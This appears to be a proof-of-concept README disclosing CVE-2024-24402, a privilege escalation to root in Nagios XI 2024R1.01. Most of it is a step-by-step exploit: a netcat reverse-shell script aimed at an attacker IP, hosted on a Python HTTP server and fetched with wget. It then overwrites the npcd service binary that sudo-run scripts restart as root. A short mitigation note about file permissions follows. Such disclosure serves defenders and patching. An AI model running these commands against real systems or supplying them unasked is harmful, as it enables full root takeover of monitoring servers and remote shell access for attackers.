Priv esc in Nagios 2024R1.01# Vulnerability Report
CVE Disovered by: Jarod Jaslow (MAWK)
## Vulnerability Details:
- **Endpoint:** Nagios XI Version 2024R1.01
- **Vulnerability Type:** Privilege Escalation from User "NAGIOS"
- **Exploitation Result:** Full root access on the target system
## Steps to Reproduce:
### 1. Create a Fresh Instance of Nagios XI Version 2024R1.01:
- Download the Nagios XI OVA file from: [https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova](https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova)
- Deploy the OVA to create a fresh instance.
-Using my previous report gain RCE on the server
### 2. Abuse Privilege Escalation:
- As the user "NAGIOS," create a file on the attacker machine with the following content:
```bash
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445
```
- Host the file on the attacker machine via a Python HTTP server:
```bash
python3 -m http.server 8000
```
- Start a Netcat (NC) listening server on the attacker machine:
```bash
nc -nlvp 4445
```
### 3. Execute the Exploitation on the Victim Computer:
- Fetch the file from the attacker machine:
```bash
wget http://<Attacker IP>:8000/npcd
```
- Execute the following commands to escalate privileges and receive a connection as root:
```bash
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
```
## Recommendation:
It is recommended to restrict the ability of the user "NAGIOS" to write to Nagios service executables that are run as root. This can be achieved by implementing stricter file permissions and access controls for the relevant directories and files associated with Nagios services.
This should be fixed in new releases
CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402
[4.0K] /data/pocs/3ba963034ad1edaba0f46c1b4aa75ee68f8493e2
└── [2.7K] README.md
0 directories, 1 file